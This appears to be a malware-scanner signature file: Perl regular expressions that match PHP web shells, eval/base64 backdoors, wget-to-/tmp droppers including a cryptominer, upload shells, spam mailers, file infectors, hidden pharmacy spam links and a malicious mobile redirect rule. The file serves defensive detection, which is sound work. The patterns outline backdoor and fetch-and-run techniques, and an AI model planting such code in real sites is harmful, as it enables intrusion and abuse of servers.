qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\)eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;.+?([A-z0-9]{1,20})\'\;/is,
qr/<\?php.+?if\s+\(\!isset\(\$\_COOKIE\[\'.+?\$compressed\=base64\_decode\(\$cookieData\).+?\$str\=\"<h1>403\s+Forbidden<\/h1><\!\-\-\s+token\:.+?return\s+array\(\$resultHeaders\,\s+\$body\)\;\s+}/is,
qr/<\?PHP\s+\$login.+?\$md5\_pass\s+\=.+?eval\(gzinflate\(base64\_decode\(.+?\?>/is,
qr/<\?\$sInjectPHP\s+\=\s+\"<iframe\s+src\=.+?function\s+Infect\(\$sDir\).+?closedir\(\$hDir\)\;\s+\}\s+\}\s+\?>/is,
qr/<iframe\s+src\=\"http\:\/\/.+?\.php\?.+?\"\s+width\=\"0\"\s+height\=\"0\"\s+frameborder\=\"0\"><\/iframe>/is,
qr/<\?\s+\@include\s+\$\_GET\[\"([A-z0-9]{1,20})\"\]\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?(r57|c99)\?\"\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?bypass\.txt\?\?\"\)\;\s+\?>/is,
qr/<\?php\s+echo\s+base64\_decode\(\"([A-z0-9]{1,20})\"\)\;\s+\@include\(\"http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php\s+echo\s+\"MFTeaM\"\;\@include\(\"http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php.+?preg\_replace\(\"\\x2F.+?\\x3B\"\,\"\\x2E\"\)\;\s+\?>/is,
qr/<\?php\s+\@ob\_start\(\)\;.+?if\s+\(\!isset\(\$\_COOKIE\[\'key\'\]\)\)\s+\{.+?\$func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;.+?\$remove\_tags\(\$content\)\;.+?return\s+\$content\;\s+\}/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\w\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(stripslashes\(\@\$\_POST\[\(chr\(([0-9]{1,20})\)\.chr\(([0-9]{1,20})\)\)\]\)\)\;\?>/is,
qr/<\?\s+\$GLOBALS\[.+?\]\=Array\(base64\_decode\(.+?\)\;return\s+base64\_decode\(\$\w\[\$\w\]\)\;\}\s+\?>/is,
qr/<\?php\s+\$\_\d\=\_([0-9]{1,20})\(([0-9]{1,20})\).+?\.\$\_\d\[round\(\d\+\d\.\d\+\d\.\d\+\d\.\d\+\d\.\d\+\d\.\d\)\]\,\$\_\d\,\_([0-9]{1,20})\(([0-9]{1,20})\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{32})\"\;\$([A-z0-9]{1,20})\=\".+?\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$command\s+\=\s+\"wget\s+http\:\/\/.+?cryptonight.+?\{\s+echo\s+execCommand\(\$command\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$tag\s+\=\s+\'\s+\*\s+\@package\s+general\'\;\s+\$code\s+\=\s+<<<\'CODE\'\s+\*\/.+?CODE\;\s+\$injectType\s+\=\s+1\;.+?unlink\(\_\_FILE\_\_\)\;\s+\?>/is,
qr/<\!doctype\s+html>.+?<title>MAILER<\/title>.+?function\s+doset\(\)\s+\{.+?print\s+\"\s+SEND<br>\"\;\s+flush\(\)\;.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<html>\s+<head>\s+<title>Mail<\/title>.+?\$attach\[\$h\]\=\s+base64\_encode\(fread\(\$f\,filesize\(\$HTTP\_POST\_FILES\[\'filename\'\]\[\'tmp\_name\'\]\[\$h\]\)\)\)\;.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<html>\s+<head>\s+<title><\?php\s+tr\(\'name\'\,false\)\;\s+\?>\s+<\?php\s+echo\s+VERSION\;\?><\/title>.+?function\s+pingoutservers\(\)\s+\{.+?function\s+StopSendMail\(\)\s+\{.+?<\/body>\s+<\/html>/is,
qr/<\!DOCTYPE.+?<title>\(c\)\s+private\s+mail\-worker\s+\(c\)<\/title>.+?function\s+randmail\(\).+?\$numemails\s+\=\s+count\(\$allemails\)\;.+?<\/style>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+Error\_Reporting\(E\_ALL.+?<title>FakeSender\s+by\s+POCT\s+\[FuckAV\.ru\]<\/title>.+?if\(mail\(\$to\,\s+\$subject\,\s+\$message\,\s+\$header\)\).+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?\s+eval\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php.+?\?>([A-z0-9]{1,20})\%([A-z0-9]{1,20})\%.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+if\(\@isset\(\$\_SERVER\[HTTP\_.+?\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[.+?\]\)\)\;\}exit\;\?>.+?sites\/libasset\.php/is,
qr/<\?php.+?c99\s+injektor.+?<\?php\s+chdir\(\$lastdir\)\;\s+c99shexit\(\)\;\s+\?>/is,
qr/<\?php.+?\$language\=\'ru\'\;.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$script\s+\=\s+basename\(\_\_FILE\_\_\)\;.+?function\s+getUniqueCode\(\)\{.+?\$pageURL\.\"osh3\.php\"\;.+?o3\:\$o3<br>\"\;\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\?>/is,
qr/<\?\s+\$times\=rand\(.+?\$code\=\s+<<<EOD.+?\$encoded\=base64\_encode\(\$code\)\;.+?closedir\(\$dh\)\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?.+?if\(isset\(\$\_SERVER\[\'WINDIR\'\]\)\)\{.+?if\(strstr\(\$contents\,\"c99\"\)\)\{\s+return\s+true\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\@system\(\"cd\s+\/tmp\;wget\s+http\:\/\/.+?\@shell\_exec\(\"cd\s+\/tmp\;wget\s+http\:\/\/.+?\?>/is,
qr/<\?php.+?array\(\"\.\"\,\"\.\.\"\,\"\.\.\/\.\.\"\,\s+\"\.\.\/\.\.\/\.\.\"\)\;.+?array\(\"index\.html\"\,\s+\"index\.htm\"\,\s+\"index\.shtml\"\,\s+\"default\.asp\"\)\;.+?\]\)\.\"\?domain\=\"\.base64\_encode\(\$\_SERVER\[\'HTTP\_HOST\'\]\)\)\;.+?\"\)\;\s+\?>/is,
qr/<\?php.+?\@shell\_exec\(\"cd\s+\/tmp\;\s+wget\s+http\:\/\/.+?\?>/is,
qr/<\?\s+error\_reporting\(.+?\)\.\"\.\"\.base64\_encode\(\$.+?if\s+\(\(include\(base64\_decode\(.+?\)\.\"\/\?\"\.\$str\)\;\}\s+\?>/is,
qr/GIF89a.+?<\?php\s+eval\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\;\s+\?>/is,
qr/GIF89a.+?<\?php.+?webadmin\.php.+?function\s+error\s+\(\$phrase\)\s+\{.+?\}\s+\?>/is,
qr/GIF89a.+?<\?php\s+if\s+\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\s+eval\(stripslashes\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+print\s+\'\!hacked\!\'\;\s+\?>/is,
qr/<\?php\s+system\(\'wget\s+http\:\/\/.+?\)\;\?>/is,
qr/<\?php\s+error\_reporting.+?upload\s+shell.+?move\_uploaded\_file\(\$saw1\,\$saw2\)\;\s+\}\s+\?>/is,
qr/GIF89a.+?<\?\s+eval\(stripslashes\(\$\_POST\[\w\]\)\)\;exit\;\?>\;/is,
qr/<\?php\s+error\_reporting\(.+?\$cookiename\=.+?\'\.getenv\(\"HTTP\_HOST\"\)\.\'\s+\~\s+Shell\s+I.+?exit\(\)\;\s+\?>/is,
qr/<\?\s+\$buffer\s+\=.+?\$buffer\.\=.+?\$newphrase\=str\_replace\(.+?eval\(\$\_\w\(\$newphrase\)\)\;\s+\?>/is,
qr/<\?pHp\s+\$([A-z0-9]{1,20})\s+\=\s+urldecode\(\$\_GET\[\'\w\'\]\)\;\s+\@ini\_set\(\'output\_buffering\'\,0\)\;\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;\s+\$auth\_pass\s+\=\s+\"([A-z0-9]{32})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+file\_get\_contents\(\$([A-z0-9]{1,20})\)\;\s+eval\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php.+?function\s+ASGLogin\(\)\s+\{.+?if\s+\(empty\(\$tmpdir\)\).+?<\/html><\?php\s+chdir\(\$lastdir\)\;\s+\?>/is,
qr/<\?php.+?str\_replace\(\"j\"\,\"\"\,\"sjtrj\_jrjejpljajcje\"\)\;.+?\(\"i\"\,\s+\"\"\,\s+\"ibiaisie6i4i\_dieicoide\"\)\;.+?\(\"k\"\,\"\"\,\"crkekatkek\_kfkukncktkikon\"\)\;.+?\(\)\;\s+\?>/is,
qr/GIF89a1\s+<\?php\s+\@error\_reporting\(NULL\).+?\$nowaddress\=.+?\$nowaddress.+?Upload.+?<\/form>\"\;\s+\?>/is,
qr/<\?php\s+echo\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?\/\*\s+eval\(base64\_decode\(+?\)\)\;\s+\*\/\s+\?>/is,
qr/<\?php.+?\$cache\_folder\s+\=\s+\"wtuds\"\;\s+\$template\_folder\s+\=\s+\"sotpie\"\;.+?\$user\_agent\_to\_filter\s+\=\s+array\(.+?exit\;\s+\}\s+\?>/is,
qr/<\?php\s+ignore\_user\_abort\(\)\;.+?if\s+\(strpos\(\$inn\,\s+\"\.php\.suspected\"\)\).+?rename.+?\?>/is,
qr/<\?php\s+extract\(\$\_COOKIE\)\;\s+if\s+\(\$\w\)\s+\{\s+\@\$\w\(\$\w\,\$\w\)\;\s+\@\$\w\(\$\w\(\$\w\,\$\w\)\)\;\s+\}/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\?>/is,
qr/<\?php\s+header\(.+?\$Remote\_server.+?function\s+GetHtml\(\$url\)\s+\{\s+return\s+getHTTPPage\(\$url\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"\"\;\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\.\'([A-z0-9]{1,20})\'\..+?\$([A-z0-9]{1,20})\=([A-z0-9]{1,20})\(\)\;.+?\$([A-z0-9]{1,20})\=array\(.+?\$([A-z0-9]{1,20})\=([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+join\(\'\'\,\s+\$([A-z0-9]{1,20})\)\s+\)\;.+?return\s+\"\{\$([A-z0-9]{1,20})\}\{\$([A-z0-9]{1,20})\}\"\;\s+\}\s+\?>/is,
qr/<\?php.+?\$subject\s+\=\s+\"php\s+SSH\"\;.+?if\s+\(\$hist\_arr\)\s+\{.+?<\/BODY>\s+<\/HTML>/is,
qr/<\?php\s+echo\s+\'\'\;\s+\$([A-z0-9]{1,20})\s+\=\s+\"\\x61\"\s+\.\s+\"s\"\s+\.\s+\"\\x73\"\s+\.\s+\"e\"\s+\.\s+\"r\"\s+\.\s+\"\\x74\"\s+\.\s+\"\"\;\s+\@\s+\$([A-z0-9]{1,20})\s+\(\s+\"e\"\s+\.\s+\"v\"\s+\.\s+\"a\"\s+\.\s+\"l\"\s+\.\s+\"\(\"\s+\.\s+\"g\"\s+\.\s+\"z\"\s+\.\s+\"u\"\s+\.\s+\"n\"\s+\.\s+\"c\"\s+\.\s+\"\\x6f\"\s+\.\s+\"m\"\s+\.\s+\"\\x70\"\s+\.\s+\"\\x72\"\s+\.\s+\"E\"\s+\.\s+\"\\x73\"\s+\.\s+\"S\"\s+\.\s+\"\(\"\s+\.\s+\"b\"\s+\.\s+\"a\"\s+\.\s+\"s\"\s+\.\s+\"\\x65\"\s+\.\s+\"6\"\s+\.\s+\"4\"\s+\.\s+\"\\x5f\"\s+\.\s+\"d\"\s+\.\s+\"\\x.+?\)\)\)\;\"\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,.+?function\s+wp\_cd\(\$.+?\$npDcheckClassBgp.+?\}\s+\?>/is,
qr/<\?php\s+\$login\=\"\"\;\s+\$md5\_pass\=\"\".+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*.+?\*\/\s+\@error\_reporting\(0\)\;\s+\@eval\(base64\_decode\(\".+?\)\)\;\s+\/\*.+?\*\/\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\$([A-z0-9]{1,20})\(\"\"\)\;\s+\$([A-z0-9]{1,20})\=\(\d\d\d\-\d\d\d\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/\?\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'\#\#\#\#\#\#\#\#\#\#\#e\#\#va\#\#\#\#\#\#\#\#l\#\(\#\#b\#\#\#\#\#a\#\#\#\#\#\#\#\#\#\#\#s\#\#\#\#\#e\#\#6\#\#\#\#4\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\_\#\#d\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#e\#\#c\#o\#\#de\#\#\#\#\#\#\#\(\#\#\\\'.+?\$([A-z0-9]{1,20})\=str\_replace\(\'\#\'\,\s+\'\'\,\s+\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=create\_function\(\'\'\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{20,}).+?eval\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\;\s+\?>/is,
qr/<\?php.+?GLOBAL\s+\$wehaveitagain\;.+?\/\/\}\}([A-z0-9]{5,})\s+\?>/is,
qr/<html>.+?print\s+\"<h1>\#p\@\$c\@\#<\/h1>\\n\"\;.+?touch\/\*\;\*\/\(\$filename\,\s+\$time\)\;.+?<\/html>/is,
qr/<script\s+type\=\"text\/javascript\">var\s+a\=\"\'([A-z0-9]{1,20})\'.+?clen\;clen.+?clen.+?String\.fromCharCode\(a\.charCodeAt\(.+?unescape.+?document\.write\(\w\)\;<\/script>/is,
qr/<\?php\s+\/\*versio\:\d\.\d\d\*\/\s+\$GLOBALS\[\"([A-z0-9]{1,20})\".+?\)\;\s+return\s+\$\w\(substr\(\$\w\,\s+\$\w\,\s+\$\w\)\)\;\}\;eval\(([A-z0-9]{1,20})\(([A-z0-9]{1,20})\,([A-z0-9]{1,20})\)\)\;\}\;\?>/is,
qr/<\?php\s+\$.+?\'gzun.+?ress\'\;\$.+?\'ba.+?64.+?array\(.+?eval\(.+?\?>/is,
qr/\/\/istart.+?\/\/iend/is,
qr/<\?php\s+if\(\!class\_exists\(.+?\$this\->show\_xmlsitemap\(\)\;.+?wp\_sysoptions.+?\$jos\_opti\=new.+?\}\s+\?>/is,
qr/<\?php\s+ob\_start\(\)\;\s+var\_dump\(\$\_POST\,\s+\$\_GET\,\s+\$\_COOKIE\,\s+\$\_FILES\)\;\s+\$output\s+\=\s+ob\_get\_clean\(\)\;\s+\$fp\s+\=\s+fopen\(\'\.\/error\_log\'\,\s+\'a\'\)\;\s+fwrite\(\$fp\,\s+print\_r\(\$output\,\s+TRUE\)\)\;\s+fclose\(\$fp\)\;\s+ob\_end\_clean\(\)\;\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$array\s+=\s+array\(.+?\).+?eval\(\$gzc\(\$b64\(\$r13\(\$.+?\?>/is,
qr/<\?php\s+\$.+?\"pre\"\.\"g\_\"\.\"rep\"\.\"lace\"\;\s+\$.+?\(strrev\(\"e\/\*\.\/\"\)\,\s+strrev\(\"\(edoced\_46esab\(etalfnizg\(lave\"\)\.\".+?\)\;\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\"\\x.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\].+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\]\)\;\s+\}\s+\}/is,
qr/<\?php.+?class\s+browseDir\s+\{.+?function\s+upload\(\$ifupload\)\{.+?if\(\!empty\(\$eval\)\s+\&\&\s+\$eval\s+\!\=\s+\'\'\)\{.+?<\/body><\/html>\s+\<\?\}\?>/is,
qr/<span\s+style\=\"position\:absolute\;visibility\:\s+collapse\;\">.+?(viagra|cialis|levira|kamagra).+?<\/a>\s+<\/span>/is,
qr/<\?php.+?c40shell\.php\s+v\.Undetected.+?<\?php\s+chdir\(\$lastdir\)\;\s+c40shexit\(\)\;\s+\?>/is,
qr/<\?PHP\s+\#\s+Web\s+Shell\s+by\s+oRb.+?\\x3B\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?([A-z0-9]{1,20})\|.+?\;\$([A-z0-9]{1,20})\=\_\_FILE\_\_\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\{\d\}\.\$([A-z0-9]{1,20})\{\d\d\}\.\$.+?eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?([A-z0-9]{1,20})\=\=\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\;\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20})\=\_\_FILE\_\_\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\{\d.+?eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20}).+?\)\)\)\;return\;.+?([A-z0-9]{1,20})\=\=\'\;/is,
qr/<\?php\s+\$login\_successful\s+\=\s+false\;.+?function\s+selfURL\(\)\s+\{.+?if\(eregi\(\"Linux\"\,\$OSV\)\).+?\$proxy\_shit\=.+?\$([A-z0-9]{1,20})\s+\=\s+urlencode\(\$\w\)\;\s+\?>/is,
qr/<script>\s+var\s+\_0x([A-z0-9]{1,10})\=\[.+?\(\)\;\"\,\"\\x([A-z0-9]{2})\"\,\"\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\"\,\"\\x([A-z0-9]{2}).+?\]\;eval\(function\(\_0x.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+\/\/3Turr\~C0nfig\s+public\s+edition.+?\@symlink\(\'\/\'\,\s+\'Turr\/root\'\)\;.+?<\/html>\'\;\s+\}\s+\?>/is,
qr/<font\s+id=\"([A-z0-9]{1,20})\"\s+color=\"\#00FFFF\"\s+style=\"width:\s+0;\s+height:\s+0;overflow:\s+hidden;\s+font-family:courier;\s+position:\s+absolute;\s+font-size:\d\dpx\"><a\s+href=http:\/\/.+?(viagra|pharmacy|cialis|levitra).+?<\/a><\/font>/is,
qr/<\?php.+?--==\[\[BSKH Auto Symlink\]\]==--.+?gzinflate\(base64\_decode\(\$.+?\}eval\(.+?\)\);\s+\?>/is,
qr/<\?php\s+\@error_reporting\(0\);\s+\@set_time_limit\(0\);\s+\$code = \".+?\";\s+\@\s+\?>/is,
qr/;tixe.+?;\)0\(emitnur_setouq_cigam_tes\@.+?\" = ssap_htua\$/is,
qr/<span style=\"font-size:5px; font-style:italic; font-family:Arial; width:\d\dpx; display:none; color:violet;\">\s+<a href=http:\/\/.+?(viagra|cialis|levitra).+?<\/a>\s+<\/span>/is,
qr/<?php if \(isset\(\$_GET\[\"CONFIG\"\]\)\) if \(.+?md5\(\$_GET\[\"CONFIG\"\]\)\)\{.+?if\(is_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\]\)\)\{move_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\);return null;\} \?>/is,
qr/<\?php extract\(\$_REQUEST\) \&\& \@assert\(stripslashes\(\$([A-z0-9]{1,20})\)\) \&\& exit;/is,
qr/<\?php.+?if\(\!function_exists\(\"scandir\"\)\) \{.+?\$currentCMD = str_replace\(.+?Command completed.+?exit;\s+\?>/is,
qr/<\?php if \(\$_FILES\[\'([A-z0-9]{1,20})\'\]\) \{move_uploaded_file\(\$_FILES\[\'([A-z0-9]{1,20})\'\]\[\'tmp_name\'\], \$_POST\[\'Name\'\]\); echo \'OK\'; \} else \{ echo \'You are forbidden\!\'; \} \?>/is,
qr/<\?php if\( isset\( \$_REQUEST\[\"\w\"\] \) \) \{ system\( \$_REQUEST\[\"\w\"\] \. \" 2>\&1\" \); \}/is,
qr/<\?php.+?Hacked by Ammar The-InJx.+?return \$info;\s+\}\s+\?>/is,
qr/<\?php\s+if\(\!class_exists\(\'.+?\{\$is_bot=1;\}\$bad_file=array\(\"png.+?AND\@preg_match\(\'\/bing\|msn.+?urldecode\(.+?\\x\w\w\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9]{1,20})=\"([A-z0-9]{20,}).+?\$([A-z0-9]{1,20}) = str_replace\(\"b\",\"\",\"bsbtbrb_rbebpblacbe\"\); \$([A-z0-9]{1,20})=\"([A-z0-9]{20,}).+?\$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"q\", \"\", \"qbaqsqeq6q4q_qdqecoqde\"\); \$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"z\",\"\",\"crzezatez_fzunctzizon\"\); \$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"\", \$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\"([A-z0-9]{1,20})\", \"\", \$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\); \$([A-z0-9]{1,20})\(\); \?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/\s+if\(md5\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\s+\=\=\=\s+\"([A-z0-9]{32})\"\)\s+\{\s+eval\(base64_decode\(\$\_POST\[\"([A-z0-9_]{1,20})\"\]\)\)\;\s+\}\s+\/\*([A-z0-9]{1,20})\*\/\s+\?>/is,
qr/<\?php\s+\/\*\w,\w,\w,\w,\w.+?\w,\w,\w,\w,\w\*\/\s+\?>/is,
qr/<\?php.+?if \(stristr\(php_sapi_name\(\).+?404\);\} exit\(\); \?>/is,
qr/<\?php\s+if \(!isset\(\$sRetry\)\).+?\$stCurlLink = base64_decode\(.+?curl_close\(\$stCurlHandle\)\;.+?\?>/is,
qr/eval\(\"\?\>\" \. base64_decode\(.+?\)\); \?>/is,
qr/<\?php.+?\$alphabet =.+?exit\(\);.+?\$([A-z0-9]{1,20}) =.+?\"\"\.chr\(.+?\)\.\"\"\.chr\(.+?\)\.\"\\x.+?\]\.\$([A-z0-9]{1,20})\[\d\d\], \$([A-z0-9]{1,20}) ,\"([A-z0-9]{1,20})\"\);/is,
qr/<\? echo\(base64_decode\(.+?\)\); \?>/is,
qr/<\?php.+?\$auth_pass.+?FilesMan.+?preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3B\",\"\.\"\);\?>/is,
qr/<\?php\s+\@preg_replace\(\"\\x.+?\);\?>/is,
qr/<\?php \$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}).+?\);\$([A-z0-9]{1,20}) = \"([A-z0-9]{20,})\";\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20}) = \"\"; \?>/is,
qr/<\?php if \(\$_SERVER\[\'QUERY_STRING\'\] != \"passw0rd\"\) \{.+?\$uploadfile = \$uploaddir \. basename\(\$_FILES\[.+?\$numemails mail\(s\) was sent successfully\'\); <\/script>\";.+?\?>\s+<\/body>\s+<\/html>/is,
qr/\@ini_set\(\'display_errors\', \'0\'\);.+?if \(!\$npDcheckClassBgp\) \{.+?str_replace\(\'([A-z0-9_]{1,20})\', \'bas\'.+?str_replace\(\'([A-z0-9]{1,20})\', \'64\'.+?function wp\_cd\(\$fd, \$fa=\"\"\).+?fwrite\(\$hdl, \"<\?php\\n\$mtchs\[1\]\\n\?>\"\);.+?\$npDcheckClassBgp = \'([A-z0-9]{1,20})\';\s+\}/is,
qr/<html>.+?<body>\s+<script type=\"text\/javascript\">.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+setTimeout\(([A-z0-9]{1,20})\(\),([0-9]{1,5})\);\s+\}\s+function ([A-z0-9]{1,20})\(\)\s+\{\s+([A-z0-9]{1,20}) = ([A-z0-9]{1,20})\(\);\s+([A-z0-9]{1,20}) = \[([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}).+?\}\s+<\/script>\s+<\/body>\s+<\/html>/is,
qr/<html>.+?<body>\s+<script type=\"text\/javascript\">.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+setTimeout\(([A-z0-9]{1,20})\(\),([0-9]{1,5})\);\s+\}.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+([A-z0-9]{1,20}) = ([A-z0-9]{1,20})\(\);\s+([A-z0-9]{1,20}) = \[([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}).+?\}\s+<\/script>\s+<\/body>\s+<\/html>/is,
qr/<\?php \/\* get_header\(\); .+?\$wordpress_report = strrev \(.+?\@move_uploaded_file\(\$open_image_tmp,\$image_tmp\);.+?\?>/is,
qr/<\?\s+\/\/ \@\~ PRO Mailer V2.+?return stripslashes\(ltrim\(rtrim\(\$string\)\)\);.+?function SendOrMail\(\$from\) \{.+?sent successfully\'\); <\/script>\";\}\}\s+\?>/is,
qr/preg_replace\(\"\/\.\+\/e\",\"\\x65.+?\\x3B\",\"\.\"\);/is,
qr/if \(isset\(\$_GET\[\'CONFIG\'\]\)\) if \(.+?if\(is_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\$file = \$_FILES\/\*;\*\/\[.+?touch\/\*;\*\/\(\$filename, \$time\);\s+return null;\s+\}/is,
qr/<\?php\s+\$\w = array\(.+?\);\s+\$([A-z0-9]{1,20}) = implode\(\"\", \$\w\);\s+\$([A-z0-9]{1,20}) = \"base64_decode\";\s+\$([A-z0-9]{1,20}) = \"gzuncompress\";\s+\$([A-z0-9]{1,20}) = \"str_rot13\";\s+eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\);\s+\?>/is,
qr/<\?php echo base64_decode\(\'([A-z0-9]{1,20})\'\); if\( isset\( \$_REQUEST\[\'\w\'\] \) \) \{ system\( \$_REQUEST\[\'\w\'\] \. \' 2>\&1\' \); \}/is,
qr/<\?php\s+\/\/header\(.+?=urldecode\(.+?<spango>.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\]\(\);\?>/is,
qr/<\?php\s+if \(\$_REQUEST\[\'action\'\] ==.+?base64_decode\(\$_REQUEST\[.+?if \(mail\(stripslashes\(base64_decode\(\$.+?\} else \{echo \'not found\';\}/is,
qr/<\?php.+?\$filter = base64_decode\( \$kses_str \);.+?echo \$wp_auth_check;/is,
qr/<\?php.+?\$wp_file_descriptions = array\(.+?\$search\.\"\.\@\"\.\$wp_file_descriptions\[\'rtl\.css\'\]\);\s+\?>/is,
qr/<\?php \@eval\(\"\?>\"\.base64_decode\(.+?\)\);\/\/Generated by Ampare PHP Encoder. For more security please use php protect before encode the php program/is,
qr/<\?php echo \'<div style=\"position:absolute; left:-9000px;\"><a href=\"http:\/\/.+?\">(viagra|cialis|levitra)<\/a><\/div>\'; \?>/is,
qr/if\(\$([A-z0-9]{1,20})=curl_init\(\)\)\{if\(isset\(\$_GET\[base64_decode.+?curl_close\(\$([A-z0-9]{1,20})\);\}\}/is,
qr/RewriteEngine on\s+RewriteCond \%\{HTTP_USER_AGENT\} android \[NC,OR\].+?RewriteCond \%\{HTTP_USER_AGENT\} !\(windows\\\.nt\|bsd\|x11\|unix\|macos\|macintosh\|playstation\|.+?RewriteRule \^\(\.\*\)\$ http:\/\/.+?\.ru \[L,R=302\]/is,
qr/<\? function ([A-z0-9_]{1,20})\(\$\w\)\{\$\w=Array\(\'.+?\);return base64_decode\(\$\w\[\$\w\]\);\} \?><\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\].+?\)\); \?>/is,
qr/error 407<\?php system\(\$_GET\[cmd\]\); \?>/is,
